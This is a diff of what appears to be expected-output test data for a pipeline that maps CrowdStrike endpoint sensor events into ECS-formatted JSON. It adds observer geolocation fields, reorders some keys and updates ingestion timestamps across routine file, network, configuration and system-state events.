@@ -4534,8 +5134,11 @@ "67.43.156.14" ] }, + "os": { + "type": "linux" + }, "event": { - "ingested": "2021-12-09T13:36:11.150943400Z", + "ingested": "2021-12-14T14:41:26.533773963Z", "original": "{\"ConfigBuild\":\"1007.8.0010912.1\",\"event_simpleName\":\"ConfigStateUpdate\",\"event_platform\":\"Lin\",\"ConfigStateHash\":\"1284133626\",\"ConfigStateData\":\"0,0,1007.8.0010912.1|1,c,0|1,10,1|1,11,0|1,12,1|1,13,1|1,14,19|1,15,3|1,1f,4|1,22,3|1,3b,1|1,59,2d|1,d3,263|1,d4,0|1,eb,36|1,201,1|2,0,a8000000032,140000000085,18000000004c,18000000004f,180000000054,18000000022a,180000000248,180000000279,18000000027a,1800000002b4,180400000079,180400000225,180c00000133,180c00000285,181000000128,181000000180,18100000021f,181000000220,181000000280,1c0400000205|\",\"name\":\"ConfigStateUpdateLinV1\",\"aip\":\"67.43.156.14\",\"id\":\"ffffffff-1111-11eb-8e88-068a8894a447\",\"aid\":\"ffffffff4f4044b689d6420d303e4ecd\",\"timestamp\":\"1625677436454\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:03:56.454Z", "kind": "event", @@ -4604,12 +5207,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff88b948c6abeeee910f6d8c33", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.8.0011611.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff88b948c6abeeee910f6d8c33", + "type": "agent", + "version": "1007.8.0011611.1" }, "@timestamp": "2021-07-07T17:02:45.906Z", "file": { 
@@ -4631,7 +5243,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150949700Z", + "ingested": "2021-12-14T14:41:26.533774355Z", "original": "{\"event_simpleName\":\"LFODownloadConfirmation\",\"ConfigStateHash\":\"1333055909\",\"aip\":\"67.43.156.14\",\"DownloadServer\":\"lfodown01-b.cloudsink.net\",\"DownloadPath\":\"/osfm/linux/bde98295e6e5fa4c6ba2acfebc2e9943c836bf2223aebb8b29e03c44df43cb53\",\"DownloadPort\":\"443\",\"ConfigBuild\":\"1007.8.0011611.1\",\"event_platform\":\"Lin\",\"name\":\"LFODownloadConfirmationLinV1\",\"CompletionEventId\":\"Event_KmaExtDownloadCompleteLinV1\",\"id\":\"ffffffff-1111-11eb-8dee-0201f64cca29\",\"aid\":\"ffffffff88b948c6abeeee910f6d8c33\",\"timestamp\":\"1625677365906\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"KernelModuleArchiveExt11611\"}", "created": "2021-07-07T17:02:45.906Z", "kind": "event", @@ -4670,12 +5282,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffffe6244708bd09a6c111f63f4a", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffe6244708bd09a6c111f63f4a", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:02:33.633Z", "file": { 
@@ -4701,7 +5322,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150955900Z", + "ingested": "2021-12-14T14:41:26.533774771Z", "original": "{\"event_simpleName\":\"TarFileWritten\",\"ContextTimeStamp\":\"1625677353.633\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"365049009681176519\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"FileIdentifier\":\"050000010000000000000000000000005749420100000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"TarFileWrittenMacV1\",\"id\":\"ffffffff-1111-11eb-9497-028a0bfcf603\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffe6244708bd09a6c111f63f4a\",\"timestamp\":\"1625677353895\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/Users/user7/.rbenv/versions/2.6.6/lib/ruby/gems/2.6.0/cache/database_cleaner-1.8.5.gem\"}", "created": "2021-07-07T17:02:33.895Z", "kind": "event", @@ -4725,17 +5346,23 @@ }, { "observer": { - "serial_number": "ffffffff2977460db2898ece881a9358", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff2977460db2898ece881a9358", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:02:30.466Z", - "os": { - "type": "macos" - }, "ecs": { "version": "1.12.0" }, 
@@ -4750,8 +5377,11 @@ "67.43.156.14" ] }, + "os": { + "type": "macos" + }, "event": { - "ingested": "2021-12-09T13:36:11.150962300Z", + "ingested": "2021-12-14T14:41:26.533775153Z", "original": "{\"event_simpleName\":\"AgentConnect\",\"ConfigStateHash\":\"3967242894\",\"NetworkContainmentState\":\"0\",\"VerifiedCertificate\":\"7431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf\",\"aip\":\"67.43.156.14\",\"ConfigIDBase\":\"65994753\",\"FailedConnectCount\":\"404\",\"ConnectType\":\"1\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"ConfigurationVersion\":\"10\",\"Entitlements\":\"15\",\"name\":\"AgentConnectMacV5\",\"ConfigIDPlatform\":\"4\",\"PreviousConnectTime\":\"1625673963.331\",\"id\":\"ffffffff-1111-11eb-ba54-02a3616f6acd\",\"ConfigIDBuild\":\"13701\",\"ConnectTime\":\"1625677350.208\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff2977460db2898ece881a9358\",\"ProvisionState\":\"0\",\"timestamp\":\"1625677350466\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:02:30.466Z", "kind": "event", @@ -4817,12 +5447,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff5e8b4724aa10088c4f71cd9a", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff5e8b4724aa10088c4f71cd9a", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:05:25.235Z", "file": { 
@@ -4844,7 +5483,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150968600Z", + "ingested": "2021-12-14T14:41:26.533775543Z", "original": "{\"event_simpleName\":\"LFODownloadConfirmation\",\"ConfigStateHash\":\"3090255842\",\"aip\":\"67.43.156.14\",\"DownloadServer\":\"lfodown01-b.cloudsink.net\",\"DownloadPath\":\"metahash+/cfs/channelfiles/0000000503/66d5e9ea15754bcfb5f9152ec7ac90ac/C-00000503-00000000-00000001.sys\",\"DownloadPort\":\"443\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"LFODownloadConfirmationMacV1\",\"CompletionEventId\":\"Event_ChannelDataDownloadCompleteMacV1\",\"id\":\"ffffffff-1111-11eb-8b09-069ee8920171\",\"EffectiveTransmissionClass\":\"0\",\"aid\":\"ffffffff5e8b4724aa10088c4f71cd9a\",\"timestamp\":\"1625677525235\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"C-00000503-00000000-00000001.sys\"}", "created": "2021-07-07T17:05:25.235Z", "kind": "event", @@ -4885,12 +5524,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "fffffffff1a64286a233d09974b1b377", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "fffffffff1a64286a233d09974b1b377", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:04:42.148Z", "file": { 
@@ -4914,7 +5562,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150974900Z", + "ingested": "2021-12-14T14:41:26.533775937Z", "original": "{\"event_simpleName\":\"AsepFileChange\",\"ContextTimeStamp\":\"1625677482.148\",\"ConfigStateHash\":\"1620585913\",\"ContextProcessId\":\"364936256754041721\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"AsepFileChangeMacV1\",\"id\":\"ffffffff-1111-11eb-9e50-064be6e56df7\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"fffffffff1a64286a233d09974b1b377\",\"timestamp\":\"1625677482403\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/System/Library/AssetsV2/com_apple_MobileAsset_MacSoftwareUpdate/5968e4faeba359dd5270ac282340cc4bd94d348c.asset/AssetData/payloadv2/ecc_data/System/Library/Spotlight/SystemPrefs.mdimporter/Contents/MacOS/SystemPrefs\",\"VnodeModificationType\":\"6\"}", "created": "2021-07-07T17:04:42.403Z", "kind": "event", @@ -4939,6 +5587,23 @@ } }, { + "observer": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.14", + "vendor": "crowdstrike", + "ip": "67.43.156.14", + "serial_number": "ffffffffdd094539a02b394c69a70aaf", + "type": "agent", + "version": "1007.8.0010912.1" + }, "process": { "entity_id": "130732827553316", "pid": 76482, @@ -4946,24 +5611,10 @@ "id": 0 } }, + "@timestamp": "2021-07-07T17:05:10.959Z", "os": { "type": "linux" }, - "url": { - "scheme": "http" - }, - "tags": [ - "preserve_original_event" - ], - "observer": { - "serial_number": "ffffffffdd094539a02b394c69a70aaf", - "address": "67.43.156.14", - "type": "agent", - "version": "1007.8.0010912.1", - "vendor": "crowdstrike", - "ip": "67.43.156.14" - }, - "@timestamp": "2021-07-07T17:05:10.959Z", "ecs": { "version": "1.12.0" }, 
@@ -4979,7 +5630,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150981100Z", + "ingested": "2021-12-14T14:41:26.533776325Z", "original": "{\"event_simpleName\":\"TerminateProcess\",\"RawProcessId\":\"76482\",\"ContextTimeStamp\":\"1625677510.959\",\"ConfigStateHash\":\"1284133626\",\"ContextProcessId\":\"130732827553316\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.8.0010912.1\",\"event_platform\":\"Lin\",\"TargetProcessId\":\"130732827553316\",\"Entitlements\":\"15\",\"name\":\"TerminateProcessLinV2\",\"id\":\"ffffffff-1111-11eb-97d0-02b2813216eb\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffdd094539a02b394c69a70aaf\",\"timestamp\":\"1625677511067\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:11.067Z", "kind": "event", @@ -5000,21 +5651,33 @@ "ContextProcessId": "130732827553316", "Entitlements": "15", "cid": "ffffffff15754bcfb5f9152ec7ac90ac" - } + }, + "url": { + "scheme": "http" + }, + "tags": [ + "preserve_original_event" + ] }, { "observer": { - "serial_number": "ffffffff70cf4070af024397f25007c7", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff70cf4070af024397f25007c7", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:02:52.544Z", - "os": { - "type": "macos" - }, "ecs": { "version": "1.12.0" }, 
@@ -5029,8 +5692,11 @@ "67.43.156.14" ] }, + "os": { + "type": "macos" + }, "event": { - "ingested": "2021-12-09T13:36:11.150987400Z", + "ingested": "2021-12-14T14:41:26.533776712Z", "original": "{\"ConfigBuild\":\"1007.4.0013701.1\",\"event_simpleName\":\"FirewallEnabled\",\"event_platform\":\"Mac\",\"ConfigStateHash\":\"3090255842\",\"Entitlements\":\"15\",\"name\":\"FirewallEnabledMacV1\",\"aip\":\"67.43.156.14\",\"id\":\"ffffffff-1111-11eb-a9e6-067d21325a03\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff70cf4070af024397f25007c7\",\"timestamp\":\"1625677372544\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:02:52.544Z", "kind": "event", @@ -5061,17 +5727,23 @@ }, { "observer": { - "serial_number": "ffffffffed984e248973f3ada1eb543d", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffed984e248973f3ada1eb543d", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:02:12.283Z", - "os": { - "type": "macos" - }, "ecs": { "version": "1.12.0" }, 
@@ -5086,8 +5758,11 @@ "67.43.156.14" ] }, + "os": { + "type": "macos" + }, "event": { - "ingested": "2021-12-09T13:36:11.150997400Z", + "ingested": "2021-12-14T14:41:26.533777119Z", "original": "{\"event_simpleName\":\"FsVolumeUnmounted\",\"VolumeName\":\"Install Google Drive\",\"ContextTimeStamp\":\"1625677332.283\",\"ConfigStateHash\":\"3090255842\",\"aip\":\"67.43.156.14\",\"VolumeMediaBSDName\":\"disk2s2\",\"VolumeMountPoint\":\"/private/tmp/KSInstallAction.dn6J5Xa1M4/m\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"FsVolumeUnmountedMacV1\",\"id\":\"ffffffff-1111-11eb-8fd9-06866dcbd3d5\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffed984e248973f3ada1eb543d\",\"timestamp\":\"1625677334451\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"VolumeIsNetwork\":\"0\"}", "created": "2021-07-07T17:02:14.451Z", "kind": "event", @@ -5148,12 +5823,21 @@ "direction": "unknown" }, "observer": { - "serial_number": "ffffffff2a0d484da8f7a9cf8bde7164", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.8.0011308.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff2a0d484da8f7a9cf8bde7164", + "type": "agent", + "version": "1007.8.0011308.1" }, "@timestamp": "2021-07-07T17:04:34.525Z", "ecs": { 
@@ -5173,7 +5857,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151003800Z", + "ingested": "2021-12-14T14:41:26.533777550Z", "original": "{\"LocalAddressIP4\":\"0.0.0.0\",\"event_simpleName\":\"NetworkListenIP4\",\"ContextTimeStamp\":\"1625677474.525\",\"ConfigStateHash\":\"2300098580\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"328911864662804336\",\"RemotePort\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.8.0011308.1\",\"event_platform\":\"Lin\",\"LocalPort\":\"23165\",\"Entitlements\":\"15\",\"name\":\"NetworkListenIP4LinV5\",\"id\":\"ffffffff-1111-11eb-88fd-06a17d0fdc05\",\"Protocol\":\"6\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff2a0d484da8f7a9cf8bde7164\",\"RemoteAddressIP4\":\"0.0.0.0\",\"ConnectionDirection\":\"2\",\"InContext\":\"0\",\"timestamp\":\"1625677474879\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:04:34.879Z", "kind": "event", @@ -5214,12 +5898,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff28414c2293e35c360213e723", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff28414c2293e35c360213e723", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:05:26.828Z", "file": { 
@@ -5251,7 +5944,7 @@ }, "event": { "action": "ELFFileWritten", - "ingested": "2021-12-09T13:36:11.151010100Z", + "ingested": "2021-12-14T14:41:26.533777940Z", "original": "{\"event_simpleName\":\"ELFFileWritten\",\"ContextTimeStamp\":\"1625677526.828\",\"ConfigStateHash\":\"1620585913\",\"ContextProcessId\":\"363122200934575406\",\"Size\":\"38798952\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"SHA256HashData\":\"35e590a61d32b72651b0cd23594d04f4671d79a843106136cf6abc324cc19027\",\"FileIdentifier\":\"040000010000000000000000000000006793f80200000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"ELFFileWrittenMacV1\",\"id\":\"ffffffff-1111-11eb-985c-02152dd35bc1\",\"ELFSubType\":\"4\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff28414c2293e35c360213e723\",\"timestamp\":\"1625677527114\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/private/var/folders/3c/z7j1h7dx3nz3xkl10c1vyxgh0000gp/T/.com.google.Chrome.M2zGjQ/_platform_specific/x86-64/zoom_x86_64.nexe\"}", "id": "ffffffff-1111-11eb-985c-02152dd35bc1", "created": "2021-07-07T17:05:27.114Z" @@ -5267,18 +5960,23 @@ }, { "observer": { - "serial_number": "ffffffff2d1245c0a32d5efcf9351272", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "6.19.11611.0", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff2d1245c0a32d5efcf9351272", + "type": "agent", + "version": "6.19.11611.0" }, "@timestamp": "2021-07-07T17:03:03.466Z", - "os": { - "type": "linux", - "version": "Linux localhost 4.14.232-176.381.amzn2.x86_64 #1 SMP Wed May 19 00:31:54 UTC 2021 x86_64" - }, "ecs": { "version": "1.12.0" }, 
@@ -5293,8 +5991,12 @@ "67.43.156.14" ] }, + "os": { + "type": "linux", + "version": "Linux localhost 4.14.232-176.381.amzn2.x86_64 #1 SMP Wed May 19 00:31:54 UTC 2021 x86_64" + }, "event": { - "ingested": "2021-12-09T13:36:11.151016300Z", + "ingested": "2021-12-14T14:41:26.533778327Z", "original": "{\"MajorVersion\":\"4\",\"event_simpleName\":\"OsVersionInfo\",\"OSVersionFileData\":\"4e414d453d22416d617a6f6e204c696e7578220a56455253494f4e3d2232220a49443d22616d7a6e220a49445f4c494b453d2263656e746f73207268656c206665646f7261220a56455253494f4e5f49443d2232220a5052455454595f4e414d453d22416d617a6f6e204c696e75782032220a414e53495f434f4c4f523d22303b3333220a4350455f4e414d453d226370653a322e333a6f3a616d617a6f6e3a616d617a6f6e5f6c696e75783a32220a484f4d455f55524c3d2268747470733a2f2f616d617a6f6e6c696e75782e636f6d2f220a\",\"BootArgs\":\"BOOT_IMAGE\\u003d/boot/vmlinuz-4.14.232-176.381.amzn2.x86_64 root\\u003dUUID\\u003d9f548782-8f9f-4dd9-873a-436ea8f3e8a6 ro console\\u003dtty0 console\\u003dttyS0,115200n8 net.ifnames\\u003d0 biosdevname\\u003d0 nvme_core.io_timeout\\u003d4294967295 rd.emergency\\u003dpoweroff rd.shell\\u003d0\",\"ConfigStateHash\":\"3712162471\",\"AgentVersion\":\"6.19.11611.0\",\"aip\":\"67.43.156.14\",\"MinorVersion\":\"14\",\"OSVersionString\":\"Linux localhost 4.14.232-176.381.amzn2.x86_64 #1 SMP Wed May 19 00:31:54 UTC 2021 x86_64\",\"ConfigBuild\":\"1007.8.0011611.1\",\"event_platform\":\"Lin\",\"name\":\"OsVersionInfoLinV4\",\"RFMState\":\"1\",\"id\":\"ffffffff-1111-11eb-93d4-0624c36f3a79\",\"OSVersionFileName\":\"/etc/os-release\",\"aid\":\"ffffffff2d1245c0a32d5efcf9351272\",\"timestamp\":\"1625677383466\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:03:03.466Z", "kind": "event", 
@@ -5355,12 +6057,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff761b4a7d9962dd9e7e776044", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffff761b4a7d9962dd9e7e776044", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:03:59.099Z", "file": { @@ -5385,7 +6096,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151022700Z", + "ingested": "2021-12-14T14:41:26.533778723Z", "original": "{\"event_simpleName\":\"CriticalFileModified\",\"ContextTimeStamp\":\"1625677439.099\",\"GID\":\"0\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"364849347227309005\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.13\",\"FileIdentifier\":\"04000001000000000000000000000000cdf3100100000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"UID\":\"0\",\"USN\":\"89566685\",\"event_platform\":\"Mac\",\"UnixMode\":\"384\",\"Entitlements\":\"15\",\"name\":\"CriticalFileModifiedMacV2\",\"id\":\"ffffffff-1111-11eb-9262-0268ab613b49\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff761b4a7d9962dd9e7e776044\",\"timestamp\":\"1625677439398\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/private/var/db/dslocal/nodes/Default/users/user9.plist/\"}", "created": "2021-07-07T17:03:59.398Z", "kind": "alert", 
@@ -5417,17 +6128,23 @@ }, { "observer": { - "serial_number": "ffffffff01c7450180352a7c58a28fb4", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff01c7450180352a7c58a28fb4", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:04:49.786Z", - "os": { - "type": "macos" - }, "ecs": { "version": "1.12.0" }, @@ -5442,8 +6159,11 @@ "67.43.156.14" ] }, + "os": { + "type": "macos" + }, "event": { - "ingested": "2021-12-09T13:36:11.151029100Z", + "ingested": "2021-12-14T14:41:26.533779137Z", "original": "{\"event_simpleName\":\"NeighborListIP6\",\"ConfigStateHash\":\"3090255842\",\"NeighborList\":\"1C-AB-C0-9B-10-A2|2607:fea8:720:1bc8:1eab:c0ff:fe9b:10a2|0|\",\"aip\":\"67.43.156.14\",\"InterfaceIndex\":\"6\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"NeighborListIP6MacV1\",\"id\":\"ffffffff-1111-11eb-ac8a-06b5e1186139\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff01c7450180352a7c58a28fb4\",\"timestamp\":\"1625677489786\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:04:49.786Z", "kind": "state", @@ -5495,12 +6215,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffffcebd42c0890d59b54279d3d3", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013806.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffcebd42c0890d59b54279d3d3", + "type": "agent", + "version": "1007.4.0013806.1" }, "@timestamp": "2021-07-07T17:03:02.785Z", "file": { 
@@ -5531,7 +6260,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151035400Z", + "ingested": "2021-12-14T14:41:26.533779575Z", "original": "{\"event_simpleName\":\"NewScriptWritten\",\"ContextTimeStamp\":\"1625677382.785\",\"UserName\":\"user3\",\"ConfigStateHash\":\"1325353086\",\"ContextProcessId\":\"364952259879648742\",\"Size\":\"8052\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"SHA256HashData\":\"359fd6e9a46f605d491225325125502ca6ba99a73ac3141f59af96627f128fc6\",\"FileIdentifier\":\"04000001000000000000000000000000ef07570000000000\",\"ConfigBuild\":\"1007.4.0013806.1\",\"event_platform\":\"Mac\",\"IsOnRemovableDisk\":\"0\",\"Entitlements\":\"15\",\"name\":\"NewScriptWrittenMacV3\",\"id\":\"ffffffff-1111-11eb-9dc1-029257dbe83b\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffcebd42c0890d59b54279d3d3\",\"timestamp\":\"1625677383057\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/Users/user3/git/it_eng_scripts/depnotify_starter/dep_notify_starter.sh\"}", "created": "2021-07-07T17:03:03.057Z", "kind": "event", @@ -5559,17 +6288,23 @@ }, { "observer": { - "serial_number": "fffffffff2c7432859ff6bbe1a0bd6af", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "fffffffff2c7432859ff6bbe1a0bd6af", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:03:07.216Z", - "os": { - "type": "macos" - }, "ecs": { "version": "1.12.0" }, 
@@ -5584,8 +6319,11 @@ "67.43.156.13" ] }, + "os": { + "type": "macos" + }, "event": { - "ingested": "2021-12-09T13:36:11.151041700Z", + "ingested": "2021-12-14T14:41:26.533780038Z", "original": "{\"event_simpleName\":\"SystemCapacity\",\"ConfigStateHash\":\"1620585913\",\"aip\":\"67.43.156.13\",\"CpuClockSpeed\":\"2400000000\",\"PhysicalCoreCount\":\"8\",\"CpuFeaturesMask\":\"7494065083908067\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"LogicalCoreCount\":\"16\",\"Entitlements\":\"15\",\"name\":\"SystemCapacityMacV1\",\"CpuVendor\":\"0\",\"CpuProcessorName\":\"Intel(R) Core(TM) i9-9980HK CPU @ 2.40GHz\",\"id\":\"ffffffff-1111-11eb-b714-066001392751\",\"CpuSignature\":\"591597\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"fffffffff2c7432859ff6bbe1a0bd6af\",\"ProcessorPackageCount\":\"1\",\"MemoryTotal\":\"17179869184\",\"timestamp\":\"1625677387216\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:03:07.216Z", "kind": "state", @@ -5624,17 +6362,23 @@ }, { "observer": { - "serial_number": "ffffffff0d7b4d839912e55b4755e85b", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff0d7b4d839912e55b4755e85b", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:02:48.429Z", - "os": { - "type": "macos" - }, "ecs": { "version": "1.12.0" }, 
